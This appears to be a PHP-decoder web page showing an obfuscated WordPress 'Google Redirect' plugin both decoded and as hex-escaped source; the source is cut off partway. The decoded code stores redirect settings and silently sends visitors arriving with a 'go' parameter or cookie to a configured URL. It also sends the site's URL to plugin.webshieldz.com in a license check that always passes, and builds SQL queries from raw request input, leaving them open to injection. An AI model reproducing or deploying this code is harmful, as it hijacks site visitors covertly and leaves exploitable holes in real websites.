Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ?> <?php ${"\x47\x4c\x4f\x42\x41\x4cS"}["\x65\x6b\x76u\x77\x66\x79q\x6d\x6f\x6c"..

Decoded Output download

<?php 
?> 
 
<?php ${"GLOBALS"}["ekvuwfyqmol"]="slug_decode";${"GLOBALS"}["vhdogefeve"]="slug_encode";${"GLOBALS"}["vbyfgyxuzpm"]="license_key";${"GLOBALS"}["zveivhnvqyd"]="x";${"GLOBALS"}["mmalhbm"]="option_value_query";${"GLOBALS"}["xyuutx"]="options_insert_query";${"GLOBALS"}["spnghb"]="options_exit_check_query";${"GLOBALS"}["aytwokucywt"]="db_table_query";require __DIR__."/../../../wp-load.php";error_reporting(0);function activate_google_redirect_plugin(){$mbfmcyy="table_name";$vgmclxqx="charset_collate";global$wpdb;${$vgmclxqx}=$wpdb->get_charset_collate();${$mbfmcyy}=$wpdb->prefix."googleredirect_options";${${"GLOBALS"}["aytwokucywt"]}="CREATE TABLE $table_name (id bigint(0) NOT NULL AUTO_INCREMENT, option_name varchar(500) NOT NULL, option_value varchar(500) NOT NULL, UNIQUE KEY id (id)) $charset_collate;";require_once(ABSPATH."wp-admin/includes/upgrade.php");dbDelta(${${"GLOBALS"}["aytwokucywt"]});${${"GLOBALS"}["spnghb"]}="SELECT * FROM $table_name WHERE option_name='redirect_direct_url'";if($wpdb->query(${${"GLOBALS"}["spnghb"]})==0){$bzvjvxxqru="options_insert_query";$iujwiwwfmlsy="options_insert_query";${$bzvjvxxqru}="INSERT INTO $table_name (option_name, option_value) VALUES ('redirect_direct_url', 'https://google.com')";$nitgqiggrh="options_insert_query";$wpdb->query(${$nitgqiggrh});${${"GLOBALS"}["xyuutx"]}="INSERT INTO $table_name (option_name, option_value) VALUES ('redirect_search_image_url', '')";$sxwngmyyis="options_insert_query";${"GLOBALS"}["hbarvdxmy"]="options_insert_query";$wpdb->query(${${"GLOBALS"}["xyuutx"]});${$iujwiwwfmlsy}="INSERT INTO $table_name (option_name, option_value) VALUES ('redirect_second', '5')";$wpdb->query(${${"GLOBALS"}["xyuutx"]});$pwoquqvjow="options_insert_query";${${"GLOBALS"}["xyuutx"]}="INSERT INTO $table_name (option_name, option_value) VALUES ('redirect_type', '0')";$wpdb->query(${$sxwngmyyis});${$pwoquqvjow}="INSERT INTO $table_name (option_name, option_value) VALUES ('license_key', '')";$wpdb->query(${${"GLOBALS"}["hbarvdxmy"]});}}activate_google_redirect_plugin();function get_option_value($option_name){${"GLOBALS"}["rbgbzoeksg"]="table_name";global$wpdb;${${"GLOBALS"}["rbgbzoeksg"]}=$wpdb->prefix."googleredirect_options";${${"GLOBALS"}["mmalhbm"]}="SELECT option_value FROM $table_name WHERE option_name='$option_name'";return$wpdb->get_results(${${"GLOBALS"}["mmalhbm"]},"OBJECT")[0]->option_value;}function update_option_value($option_name,$option_value){$nhoextg="table_name";global$wpdb;${$nhoextg}=$wpdb->prefix."googleredirect_options";${"GLOBALS"}["dfniulm"]="option_value_query";${${"GLOBALS"}["mmalhbm"]}="UPDATE $table_name SET option_value='$option_value' WHERE option_name='$option_name'";$wpdb->query(${${"GLOBALS"}["dfniulm"]});}function is_license_key_valid($license_key){${"GLOBALS"}["bmcocc"]="x";$jlyfptcn="x";${${"GLOBALS"}["zveivhnvqyd"]}=file_get_contents("https://plugin.webshieldz.com/validateLicenseKey?license_key=".${${"GLOBALS"}["vbyfgyxuzpm"]}."&site_url=".get_bloginfo("url"));${$jlyfptcn}=json_decode(${${"GLOBALS"}["bmcocc"]});if($x->status=="success"){return true;}else{return true;}}add_action("admin_menu",function(){add_object_page("Google Redirect","Google Redirect","administrator","settings",function(){if(isset($_POST["update"])&&$_POST["update"]=="settings"){update_option_value("redirect_direct_url",$_POST["redirect_direct_url"]);update_option_value("redirect_search_image_url",$_POST["redirect_search_image_url"]);update_option_value("redirect_second",$_POST["redirect_second"]);update_option_value("redirect_type",$_POST["redirect_type"]);}if(isset($_POST["update"])&&$_POST["update"]=="license"){if(is_license_key_valid($_POST["license_key"])){update_option_value("license_key",$_POST["license_key"]);}}echo"
           <div class="wrap\">
               <h1>tokenogle Redirect</h1>
               <hr />
                <div id="settings">
                 <div class=\"wp-pattern-example\">
                    <h3>Settings</h3>
                    <form method=\"post\" action=\"#">
                          <table class="form-table\">
                               <tr>
                               <td style="padding-top: 8px;" width="200px\" valign=\"top">Google Direct Redirect URL</td>
                                   <td><input size=\"40\" type=\"text" name=\"redirect_direct_url" value="".get_option_value("redirect_direct_url")."" required></td>
                            </tr>
                         <tr>
                              <td style="padding-top: 8px;" width=\"200px" valign=\"top\">Search Image URL</td>
                                   <td><input size=\"40\" type=\"text" name="redirect_search_image_url\" value=\"".get_option_value("redirect_search_image_url")."\"></td>
                           </tr>
                            <tr>
                                   <td style=\"padding-top: 8px;\" width=\"200px" valign=\"top">Redirect Second</td>
                                   <td><input size=\"40\" type=\"number" name="redirect_second" value=\"".get_option_value("redirect_second")."\" required></td>
                                </tr>
                             <tr>
                                  <td style=\"padding-top: 8px;\" width=\"200px\" valign=\"top">Redirect Type</td>
                                    <td>
                                       <input size=\"40" type="radio\" id="direct\" name=\"redirect_type" value="0\" ".(get_option_value("redirect_type")==0?"checked":"")."><label for=\"direct">Direct</label>
                                   <input size=\"40\" type=\"radio\" id="search" name="redirect_type" value=\"1\" ".(get_option_value("redirect_type")==1?"checked":"")."><label for=\"search">Search</label>
                                  </td>
                                </tr>  
                               <tr>
                                  <input style=\"display: none;\" name=\"update\" value=\"settings">
                                  <td><input class="button" type=\"submit\" value=\"Submit"></td>
                            </tr>
                          </table>
                      </form>
                 </div>
             </div>
                <hr />
               <div id=\"license">
                  <div class=\"wp-pattern-example\">
                       <h3>License</h3>
                        <form method=\"post" action="#">
                           <table class=\"form-table\">
                          <tr>
                                 <td style="padding-top: 8px;" width=\"200px\" valign=\"top">Site URL</td>
                                 <td><input size=\"40" type=\"text\" value="".get_bloginfo("url")."\" readonly></td>
                              </tr>
                               <tr>
                                <td style=\"padding-top: 8px;" width=\"200px\" valign="top">License Key</td>
                                <td><input size="40" type="text" name=\"license_key\" value=\"".get_option_value("license_key")."\" required></td>
                            </tr>
                                <tr>
                                <input style=\"display: none;\" name="update" value=\"license">
                                 <td><input class="button\" type=\"submit\" value="Submit\"></td>
                              </tr>
                           </table>
                    </form>
                   </div>
             </div>
           </div>
        ";});});if(isset($_GET["go"])&&!empty($_GET["go"])&&!isset($_GET["r"])&&is_license_key_valid(get_option_value("license_key"))){${"GLOBALS"}["duleqb"]="slug_decode";${"GLOBALS"}["kyjyhsfn"]="slug_encode";${${"GLOBALS"}["duleqb"]}=urldecode($_GET["go"]);$nuhmgp="slug_encode";${${"GLOBALS"}["kyjyhsfn"]}=base64_encode($_GET["go"]);setcookie("redirect_url_token",${${"GLOBALS"}["vhdogefeve"]},time()+(600*20),"/");setcookie("redirect_url_token",${${"GLOBALS"}["vhdogefeve"]},time()+(600*20),"/");setcookie("redirect_url_token",${${"GLOBALS"}["vhdogefeve"]},time()+(600*20),"/");setcookie("redirect_url_token",${$nuhmgp},time()+(600*20),"/");setcookie("redirect_url_token",${${"GLOBALS"}["vhdogefeve"]},time()+(600*20),"/");if(get_option_value("redirect_type")==0){die("
           <meta http-equiv=\"refresh\" content=\"".get_option_value("redirect_second")."; url=".get_option_value("redirect_direct_url")."\" />
           <h1 style=\"text-align: center;\">Redirecting in ".get_option_value("redirect_second")."s Please wait...</h1>
            <h3 style="text-align: center;\">Automatically Redirect to Website</h3>
        ");}else{die("
           <meta http-equiv=\"refresh\" content="".get_option_value("redirect_second")."; url=https://www.google.com/search?q=site:".get_bloginfo("url")."\" />
            <h1 style=\"text-align: center;\">Redirecting in ".get_option_value("redirect_second")."s Please wait...</h1>
            <center>
              <img src=\"".get_option_value("redirect_search_image_url")."\" onerror="this.parentNode.removeChild(this)" />
            </center>
           <h3 style="text-align: center;">Click on First Link from Google to Open Link</h3>
        ");}}if(isset($_COOKIE["redirect_url_token"])&&!empty($_COOKIE["redirect_url_token"])&&is_license_key_valid(get_option_value("license_key"))){${"GLOBALS"}["ipncheq"]="slug_decode";${${"GLOBALS"}["ekvuwfyqmol"]}=urldecode($_COOKIE["redirect_url_token"]);${${"GLOBALS"}["ekvuwfyqmol"]}=base64_decode(${${"GLOBALS"}["ipncheq"]});setcookie("redirect_url_token","",time()+(600*20),"/");die("
        <script>
          window.location.replace(\"".get_bloginfo("url")."?go=".${${"GLOBALS"}["ekvuwfyqmol"]}."&r");
        </script>
   ");} 
?>

Did this file decode correctly?

Original Code

<?php
?>

<?php ${"\x47\x4c\x4f\x42\x41\x4cS"}["\x65\x6b\x76u\x77\x66\x79q\x6d\x6f\x6c"]="s\x6cu\x67_d\x65\x63o\x64e";${"\x47L\x4f\x42\x41L\x53"}["\x76hdo\x67\x65\x66e\x76\x65"]="sl\x75\x67\x5fe\x6e\x63o\x64e";${"G\x4cO\x42A\x4cS"}["v\x62y\x66\x67\x79\x78\x75\x7a\x70\x6d"]="\x6c\x69\x63\x65nse\x5fke\x79";${"\x47L\x4f\x42\x41\x4c\x53"}["\x7av\x65\x69\x76\x68\x6ev\x71\x79\x64"]="x";${"\x47L\x4f\x42\x41\x4c\x53"}["m\x6d\x61\x6c\x68\x62\x6d"]="\x6f\x70\x74ion_\x76a\x6c\x75\x65_\x71uer\x79";${"\x47L\x4f\x42\x41\x4cS"}["\x78\x79\x75\x75\x74x"]="\x6fpt\x69\x6fn\x73\x5fi\x6e\x73e\x72t_\x71\x75\x65\x72\x79";${"\x47LO\x42AL\x53"}["\x73p\x6e\x67\x68b"]="\x6f\x70\x74\x69o\x6e\x73\x5f\x65\x78i\x74\x5fc\x68\x65\x63\x6b_\x71\x75ery";${"G\x4c\x4fB\x41\x4cS"}["a\x79t\x77\x6f\x6b\x75\x63yw\x74"]="db_\x74\x61\x62\x6c\x65_\x71\x75e\x72\x79";require __DIR__."/\x2e./.\x2e/../w\x70-\x6co\x61\x64\x2eph\x70";error_reporting(0);function activate_google_redirect_plugin(){$mbfmcyy="\x74\x61\x62l\x65_\x6e\x61\x6d\x65";$vgmclxqx="\x63h\x61rse\x74\x5f\x63\x6f\x6c\x6c\x61\x74\x65";global$wpdb;${$vgmclxqx}=$wpdb->get_charset_collate();${$mbfmcyy}=$wpdb->prefix."\x67\x6fo\x67le\x72\x65d\x69\x72\x65ct\x5fo\x70t\x69o\x6es";${${"GL\x4f\x42\x41L\x53"}["\x61ytwo\x6b\x75c\x79w\x74"]}="CR\x45\x41\x54E\x20\x54\x41BLE $table_name\x20(\x69\x64 \x62igi\x6et(\x30) NOT \x4e\x55\x4c\x4c\x20\x41\x55TO\x5fI\x4e\x43\x52EME\x4eT, \x6f\x70ti\x6f\x6e\x5fn\x61\x6de\x20var\x63har(\x3500)\x20\x4eOT\x20NUL\x4c,\x20op\x74\x69\x6f\x6e_va\x6cue\x20\x76\x61r\x63\x68\x61\x72(\x3500) \x4e\x4fT NUL\x4c, \x55\x4eI\x51UE\x20K\x45\x59\x20i\x64\x20(\x69d))\x20$charset_collate\x3b";require_once(ABSPATH."\x77p-\x61dm\x69n/\x69\x6e\x63ludes/upgra\x64\x65.p\x68p");dbDelta(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x61y\x74\x77\x6f\x6b\x75\x63\x79\x77\x74"]});${${"\x47\x4cO\x42AL\x53"}["\x73pn\x67\x68\x62"]}="\x53ELE\x43T *\x20FROM\x20$table_name \x57\x48\x45\x52E\x20\x6f\x70\x74ion_na\x6de=\x27\x72\x65d\x69re\x63t\x5fdirec\x74_u\x72l\x27";if($wpdb->query(${${"\x47L\x4f\x42ALS"}["\x73\x70\x6e\x67\x68\x62"]})==0){$bzvjvxxqru="\x6fp\x74\x69\x6fns\x5fi\x6e\x73e\x72t\x5fqu\x65r\x79";$iujwiwwfmlsy="\x6f\x70\x74\x69o\x6es_\x69n\x73\x65\x72\x74\x5f\x71uer\x79";${$bzvjvxxqru}="I\x4e\x53\x45R\x54\x20I\x4eTO\x20$table_name\x20(\x6f\x70ti\x6fn\x5fname,\x20\x6f\x70\x74ion\x5fv\x61l\x75e) VA\x4c\x55\x45S ('redi\x72\x65ct\x5fd\x69\x72\x65ct\x5furl', 'http\x73://g\x6f\x6f\x67\x6ce.com')";$nitgqiggrh="\x6f\x70ti\x6f\x6e\x73\x5fi\x6e\x73\x65r\x74_\x71\x75\x65r\x79";$wpdb->query(${$nitgqiggrh});${${"\x47\x4cOB\x41\x4cS"}["\x78y\x75\x75\x74\x78"]}="INSE\x52\x54\x20INT\x4f\x20$table_name (op\x74\x69\x6fn\x5fna\x6d\x65,\x20opti\x6f\x6e\x5f\x76alue) VAL\x55\x45S\x20('re\x64i\x72e\x63t_\x73\x65\x61rc\x68\x5f\x69m\x61\x67\x65\x5f\x75r\x6c\x27, \x27\x27)";$sxwngmyyis="o\x70\x74\x69\x6fns\x5f\x69n\x73er\x74\x5f\x71\x75\x65ry";${"\x47\x4c\x4fBA\x4cS"}["\x68\x62\x61\x72\x76dx\x6d\x79"]="op\x74ion\x73_in\x73e\x72\x74\x5fq\x75e\x72y";$wpdb->query(${${"\x47L\x4f\x42\x41L\x53"}["\x78\x79u\x75\x74\x78"]});${$iujwiwwfmlsy}="IN\x53\x45RT I\x4e\x54\x4f $table_name\x20(\x6fp\x74\x69\x6fn_\x6ea\x6d\x65,\x20\x6fp\x74i\x6f\x6e\x5f\x76a\x6c\x75e) \x56AL\x55\x45\x53 (\x27\x72\x65d\x69\x72e\x63\x74\x5f\x73ec\x6f\x6e\x64\x27,\x20\x275')";$wpdb->query(${${"\x47\x4cO\x42\x41LS"}["\x78\x79u\x75t\x78"]});$pwoquqvjow="o\x70\x74io\x6es\x5f\x69\x6e\x73\x65\x72\x74\x5fq\x75\x65\x72\x79";${${"\x47\x4cO\x42\x41\x4c\x53"}["\x78\x79\x75\x75\x74x"]}="I\x4eSE\x52T\x20INTO\x20$table_name (\x6fpt\x69\x6f\x6e\x5fn\x61\x6de,\x20o\x70\x74\x69\x6fn_v\x61\x6cu\x65)\x20\x56\x41L\x55\x45S ('\x72e\x64\x69\x72e\x63\x74_\x74yp\x65\x27,\x20\x27\x30')";$wpdb->query(${$sxwngmyyis});${$pwoquqvjow}="\x49\x4eS\x45\x52T \x49NTO $table_name (\x6fp\x74i\x6fn\x5fna\x6de, \x6fpt\x69on\x5fv\x61lue)\x20V\x41LU\x45\x53\x20('l\x69\x63en\x73e_\x6b\x65\x79\x27,\x20'')";$wpdb->query(${${"\x47\x4c\x4fB\x41L\x53"}["\x68\x62arv\x64\x78m\x79"]});}}activate_google_redirect_plugin();function get_option_value($option_name){${"G\x4cOB\x41\x4cS"}["\x72\x62\x67b\x7a\x6f\x65\x6bs\x67"]="t\x61\x62\x6c\x65\x5f\x6e\x61m\x65";global$wpdb;${${"G\x4c\x4f\x42A\x4c\x53"}["r\x62\x67\x62\x7a\x6f\x65\x6b\x73g"]}=$wpdb->prefix."\x67\x6f\x6fg\x6c\x65\x72e\x64\x69\x72ect_o\x70t\x69\x6f\x6e\x73";${${"\x47\x4c\x4f\x42\x41L\x53"}["m\x6d\x61\x6c\x68b\x6d"]}="\x53\x45\x4cE\x43\x54 \x6fp\x74\x69o\x6e\x5fv\x61\x6c\x75\x65\x20\x46ROM\x20$table_name \x57HER\x45 \x6fp\x74\x69on\x5fna\x6de='$option_name'";return$wpdb->get_results(${${"G\x4c\x4f\x42A\x4c\x53"}["\x6d\x6da\x6c\x68b\x6d"]},"O\x42\x4a\x45\x43T")[0]->option_value;}function update_option_value($option_name,$option_value){$nhoextg="tab\x6c\x65\x5f\x6e\x61\x6d\x65";global$wpdb;${$nhoextg}=$wpdb->prefix."\x67o\x6f\x67\x6cere\x64ir\x65c\x74_op\x74i\x6f\x6e\x73";${"\x47\x4cO\x42A\x4c\x53"}["\x64fn\x69\x75\x6c\x6d"]="\x6f\x70\x74\x69o\x6e\x5f\x76a\x6c\x75\x65\x5f\x71\x75\x65ry";${${"\x47\x4cO\x42\x41L\x53"}["\x6d\x6d\x61\x6c\x68\x62\x6d"]}="UPD\x41T\x45 $table_name \x53\x45\x54\x20\x6f\x70t\x69on\x5f\x76\x61\x6c\x75e\x3d'$option_value'\x20WHE\x52E \x6fpt\x69\x6fn_\x6e\x61\x6de=\x27$option_name\x27";$wpdb->query(${${"\x47\x4cOB\x41L\x53"}["d\x66\x6e\x69u\x6c\x6d"]});}function is_license_key_valid($license_key){${"G\x4c\x4f\x42\x41L\x53"}["\x62\x6d\x63\x6f\x63\x63"]="\x78";$jlyfptcn="x";${${"\x47LO\x42\x41\x4c\x53"}["\x7av\x65\x69vh\x6evqy\x64"]}=file_get_contents("h\x74\x74p\x73://\x70\x6cug\x69\x6e.w\x65bs\x68\x69\x65ldz\x2eco\x6d/\x76a\x6c\x69\x64ate\x4ci\x63ense\x4bey?lice\x6ese_k\x65y=".${${"G\x4c\x4fB\x41\x4c\x53"}["\x76by\x66gy\x78\x75\x7a\x70m"]}."&s\x69t\x65_ur\x6c=".get_bloginfo("\x75\x72\x6c"));${$jlyfptcn}=json_decode(${${"GL\x4fB\x41\x4c\x53"}["b\x6dc\x6fc\x63"]});if($x->status=="\x73\x75c\x63e\x73\x73"){return true;}else{return true;}}add_action("admi\x6e\x5f\x6de\x6e\x75",function(){add_object_page("G\x6fog\x6ce\x20\x52e\x64\x69\x72\x65\x63\x74","G\x6f\x6f\x67\x6c\x65\x20Red\x69r\x65\x63\x74","a\x64\x6d\x69\x6eistr\x61to\x72","se\x74\x74i\x6e\x67s",function(){if(isset($_POST["\x75\x70d\x61\x74e"])&&$_POST["updat\x65"]=="\x73\x65tt\x69ng\x73"){update_option_value("\x72\x65di\x72e\x63\x74_\x64\x69\x72\x65c\x74_u\x72\x6c",$_POST["\x72e\x64i\x72\x65\x63\x74\x5fdir\x65\x63\x74\x5fur\x6c"]);update_option_value("redi\x72\x65c\x74_\x73earc\x68\x5fi\x6d\x61ge\x5f\x75rl",$_POST["re\x64i\x72\x65\x63\x74_\x73\x65\x61\x72ch\x5fi\x6dage_url"]);update_option_value("r\x65di\x72\x65c\x74_\x73\x65cond",$_POST["\x72ed\x69r\x65\x63\x74\x5fse\x63\x6f\x6ed"]);update_option_value("\x72e\x64\x69r\x65c\x74_\x74y\x70\x65",$_POST["re\x64\x69r\x65ct_\x74y\x70e"]);}if(isset($_POST["\x75\x70\x64\x61t\x65"])&&$_POST["\x75pd\x61\x74\x65"]=="\x6cicense"){if(is_license_key_valid($_POST["li\x63e\x6e\x73e\x5f\x6b\x65y"])){update_option_value("lic\x65\x6e\x73e_\x6b\x65y",$_POST["l\x69c\x65n\x73e\x5f\x6b\x65y"]);}}echo"\n \x20  \x20\x20 \x20 \x20 \x3c\x64iv cla\x73\x73\x3d\x22w\x72ap\"\x3e\n\x20\x20\x20\x20\x20\x20\x20  \x20 \x20 \x20 <\x68\x31>token\x6f\x67le\x20\x52\x65d\x69rec\x74\x3c/\x68\x31\x3e\n\x20\x20\x20\x20\x20\x20\x20  \x20\x20 \x20 \x20<hr\x20/>\n \x20  \x20\x20\x20\x20\x20  \x20\x20  \x20<\x64\x69\x76\x20i\x64=\x22setti\x6e\x67\x73\x22\x3e\n  \x20 \x20  \x20   \x20\x20\x20   \x3c\x64\x69\x76\x20\x63\x6cas\x73=\"\x77\x70-pat\x74\x65\x72n-\x65xam\x70l\x65\"\x3e\n\x20    \x20  \x20 \x20\x20\x20\x20 \x20 \x20  <h\x33>\x53\x65\x74t\x69\x6egs</h\x33>\n  \x20\x20   \x20\x20\x20 \x20   \x20   \x20<fo\x72m \x6d\x65\x74\x68od=\"\x70os\x74\"\x20act\x69\x6f\x6e=\"#\x22>\n\x20\x20\x20\x20\x20\x20 \x20\x20  \x20\x20\x20  \x20  \x20 \x20\x20  \x20\x3c\x74a\x62l\x65\x20cla\x73\x73\x3d\x22form-ta\x62\x6c\x65\">\n \x20 \x20\x20 \x20\x20 \x20\x20\x20  \x20\x20  \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 \x20 \x3c\x74r\x3e\n \x20\x20\x20\x20\x20 \x20 \x20\x20      \x20  \x20\x20 \x20\x20\x20  \x20  \x3c\x74d\x20sty\x6c\x65\x3d\x22p\x61d\x64\x69ng-\x74o\x70:\x20\x38p\x78;\x22 \x77\x69dt\x68\x3d\x2220\x30px\"\x20\x76a\x6c\x69gn\x3d\"\x74o\x70\x22\x3eG\x6f\x6f\x67\x6c\x65\x20\x44i\x72\x65\x63\x74\x20R\x65d\x69rect\x20\x55\x52L</td\x3e\n\x20  \x20\x20\x20\x20\x20 \x20\x20 \x20 \x20\x20 \x20\x20\x20\x20  \x20  \x20\x20\x20\x20\x20\x20 \x20\x20<td\x3e<\x69n\x70ut\x20\x73iz\x65\x3d\"\x340\"\x20\x74\x79\x70\x65=\"t\x65\x78\x74\x22 \x6ea\x6d\x65\x3d\"re\x64\x69r\x65c\x74_\x64\x69r\x65\x63\x74_\x75r\x6c\x22\x20val\x75e=\x22".get_option_value("r\x65\x64\x69r\x65c\x74\x5fd\x69r\x65\x63\x74\x5f\x75\x72\x6c")."\x22 re\x71u\x69\x72\x65\x64\x3e\x3c/\x74\x64>\n\x20   \x20\x20   \x20 \x20\x20\x20  \x20 \x20\x20 \x20  \x20  \x20</t\x72>\n  \x20  \x20     \x20\x20    \x20\x20\x20 \x20  \x20<\x74\x72\x3e\n\x20\x20    \x20 \x20\x20\x20   \x20\x20 \x20\x20\x20  \x20 \x20\x20\x20\x20  \x3c\x74d \x73\x74y\x6c\x65\x3d\x22pa\x64\x64\x69ng-\x74\x6fp:\x20\x38px\x3b\x22 wid\x74h\x3d\"\x32\x30\x30p\x78\x22 v\x61\x6cig\x6e=\"t\x6f\x70\">\x53\x65\x61r\x63\x68\x20\x49\x6d\x61\x67e \x55\x52\x4c\x3c/\x74\x64\x3e\n\x20\x20\x20\x20\x20  \x20\x20 \x20  \x20  \x20  \x20 \x20\x20\x20\x20\x20  \x20 \x20\x20\x20  <td\x3e\x3c\x69nput\x20s\x69\x7ae=\"4\x30\"\x20\x74\x79\x70\x65\x3d\"\x74\x65x\x74\x22\x20na\x6de=\x22r\x65\x64i\x72ect\x5f\x73ear\x63\x68\x5f\x69m\x61\x67e_\x75rl\" v\x61\x6c\x75\x65\x3d\"".get_option_value("\x72\x65dir\x65\x63\x74\x5fs\x65\x61r\x63h\x5fi\x6da\x67e\x5fu\x72l")."\"\x3e\x3c/t\x64\x3e\n   \x20\x20  \x20\x20  \x20\x20\x20\x20   \x20\x20   \x20\x20  </\x74r>\n  \x20 \x20 \x20 \x20    \x20  \x20  \x20 \x20 \x20 \x20\x20\x20<\x74\x72\x3e\n\x20 \x20\x20\x20\x20  \x20 \x20\x20 \x20  \x20  \x20 \x20\x20  \x20\x20\x20 \x20 \x20   <t\x64\x20\x73t\x79\x6ce=\"p\x61\x64\x64i\x6eg-t\x6fp:\x208\x70x;\" width\x3d\"\x320\x30\x70x\x22 \x76al\x69\x67n\x3d\"\x74o\x70\x22\x3eR\x65\x64\x69rec\x74\x20Seco\x6e\x64</\x74\x64\x3e\n\x20 \x20  \x20 \x20  \x20\x20 \x20\x20\x20\x20\x20\x20\x20  \x20\x20  \x20\x20  \x20\x20 \x20\x20\x3c\x74\x64\x3e\x3c\x69nput si\x7a\x65=\"\x340\" t\x79\x70e\x3d\"\x6eumb\x65\x72\x22 nam\x65=\x22\x72e\x64\x69re\x63\x74\x5f\x73e\x63\x6f\x6ed\x22 v\x61\x6cue=\"".get_option_value("r\x65\x64i\x72\x65\x63\x74_s\x65\x63\x6f\x6ed")."\" r\x65\x71\x75i\x72\x65\x64\x3e</t\x64>\n\x20  \x20\x20 \x20 \x20\x20 \x20 \x20 \x20\x20\x20\x20 \x20\x20\x20\x20  \x20\x20\x20\x20  \x3c/\x74r\x3e\n\x20 \x20\x20  \x20\x20  \x20 \x20\x20\x20\x20  \x20   \x20 \x20\x20 \x20 \x3ctr\x3e\n  \x20\x20\x20 \x20\x20\x20\x20 \x20\x20\x20   \x20  \x20\x20\x20 \x20\x20  \x20 \x20 \x20 \x3c\x74\x64\x20s\x74y\x6c\x65\x3d\"\x70\x61\x64d\x69n\x67-\x74\x6fp:\x208\x70x;\"\x20\x77id\x74\x68\x3d\"2\x30\x30p\x78\"\x20\x76a\x6c\x69\x67\x6e\x3d\"t\x6f\x70\x22>\x52\x65di\x72ect\x20\x54yp\x65\x3c/\x74\x64\x3e\n  \x20  \x20\x20 \x20  \x20\x20\x20\x20\x20  \x20\x20 \x20\x20\x20  \x20\x20\x20  \x20\x20\x20  <td\x3e\n\x20  \x20\x20\x20   \x20\x20\x20\x20  \x20 \x20\x20  \x20\x20\x20 \x20\x20\x20\x20\x20\x20\x20\x20\x20 \x20\x20  <\x69\x6e\x70\x75\x74\x20\x73\x69\x7a\x65\x3d\"40\x22 \x74y\x70\x65=\x22\x72a\x64\x69o\" \x69\x64=\x22di\x72\x65c\x74\" n\x61\x6de\x3d\"re\x64\x69r\x65ct\x5f\x74\x79\x70e\x22 v\x61l\x75\x65\x3d\x220\" ".(get_option_value("red\x69rect\x5f\x74yp\x65")==0?"\x63h\x65cke\x64":"").">\x3c\x6ca\x62\x65l \x66o\x72=\"d\x69rec\x74\x22>\x44\x69r\x65\x63t\x3c/l\x61\x62el\x3e\n\x20\x20  \x20 \x20\x20 \x20  \x20\x20 \x20\x20  \x20    \x20  \x20\x20 \x20  \x20\x20<\x69n\x70\x75t\x20s\x69z\x65=\"\x34\x30\"\x20\x74y\x70\x65\x3d\"\x72a\x64i\x6f\"\x20\x69d\x3d\x22\x73e\x61rch\x22\x20name\x3d\x22\x72edir\x65ct\x5f\x74y\x70e\x22 \x76\x61lue\x3d\"1\" ".(get_option_value("\x72e\x64ire\x63\x74_\x74y\x70\x65")==1?"\x63\x68e\x63\x6be\x64":"")."\x3e\x3c\x6cab\x65l\x20\x66o\x72=\"\x73\x65a\x72c\x68\x22>\x53\x65\x61\x72\x63\x68</\x6ca\x62e\x6c>\n \x20\x20 \x20\x20  \x20\x20  \x20\x20\x20  \x20\x20 \x20\x20\x20\x20\x20  \x20 \x20  \x20 </t\x64>\n\x20 \x20 \x20\x20\x20  \x20\x20\x20 \x20  \x20  \x20 \x20\x20 \x20\x20\x20 \x20\x20\x20 </\x74r>  \n \x20 \x20\x20\x20\x20\x20 \x20  \x20 \x20\x20\x20\x20  \x20  \x20  \x20 \x20\x20 \x3ct\x72\x3e\n  \x20\x20\x20 \x20 \x20  \x20\x20\x20\x20\x20  \x20 \x20   \x20 \x20 \x20  \x20\x20 <i\x6ep\x75t st\x79le=\"\x64is\x70la\x79:\x20n\x6fne\x3b\"\x20n\x61\x6de\x3d\"u\x70d\x61t\x65\"\x20v\x61\x6cue=\"\x73\x65\x74t\x69ng\x73\x22>\n\x20 \x20\x20  \x20  \x20\x20 \x20\x20 \x20 \x20 \x20 \x20 \x20 \x20   \x20\x20\x20  \x3ctd><in\x70\x75t \x63la\x73s\x3d\x22b\x75tt\x6fn\x22\x20\x74\x79\x70\x65\x3d\"s\x75b\x6d\x69t\" \x76\x61\x6cue=\"S\x75b\x6d\x69t\x22\x3e</\x74d\x3e\n \x20\x20 \x20\x20  \x20   \x20  \x20  \x20\x20    \x20 \x20\x20\x3c/t\x72>\n\x20 \x20\x20\x20 \x20  \x20\x20  \x20 \x20  \x20\x20\x20\x20  \x20\x20</t\x61b\x6c\x65>\n \x20 \x20\x20 \x20 \x20\x20 \x20   \x20  \x20\x20\x20 </\x66o\x72m\x3e\n\x20   \x20\x20  \x20 \x20\x20\x20\x20\x20\x20 </\x64i\x76>\n\x20\x20\x20\x20\x20  \x20\x20    \x3c/div\x3e\n  \x20 \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3ch\x72\x20/>\n\x20   \x20\x20\x20\x20\x20 \x20\x20\x20 \x20\x3cdi\x76\x20i\x64\x3d\"\x6cice\x6e\x73e\x22\x3e\n  \x20 \x20  \x20\x20\x20  \x20\x20\x20  \x20\x3c\x64\x69v\x20\x63las\x73\x3d\"\x77p-p\x61tt\x65\x72n-\x65\x78\x61\x6d\x70le\"\x3e\n\x20\x20\x20 \x20\x20 \x20\x20  \x20  \x20 \x20  \x20\x20\x20\x20<\x683>Li\x63\x65\x6ese</h\x33>\n\x20  \x20 \x20\x20 \x20\x20 \x20\x20  \x20  \x20 \x20  \x20\x3c\x66\x6f\x72m \x6det\x68\x6fd=\"po\x73\x74\x22\x20a\x63\x74i\x6fn=\x22#\x22\x3e\n \x20\x20\x20  \x20\x20\x20\x20   \x20 \x20  \x20\x20\x20\x20\x20 \x20  <\x74\x61\x62\x6c\x65\x20\x63\x6cas\x73=\"f\x6f\x72m-\x74\x61\x62\x6c\x65\"\x3e\n  \x20  \x20 \x20 \x20     \x20\x20  \x20\x20\x20 \x20\x20\x20<t\x72\x3e\n \x20\x20  \x20\x20  \x20 \x20\x20  \x20\x20  \x20\x20 \x20\x20\x20  \x20 \x20\x20\x20\x20\x3ct\x64\x20\x73t\x79l\x65=\x22p\x61ddi\x6e\x67-t\x6f\x70: 8px\x3b\x22 wi\x64\x74\x68\x3d\"2\x300\x70x\"\x20va\x6ci\x67\x6e\x3d\"\x74o\x70\x22\x3eS\x69t\x65 URL</\x74\x64>\n  \x20 \x20 \x20 \x20\x20\x20\x20\x20\x20\x20 \x20\x20\x20\x20\x20  \x20\x20\x20\x20  \x20   \x3c\x74d>\x3ci\x6epu\x74 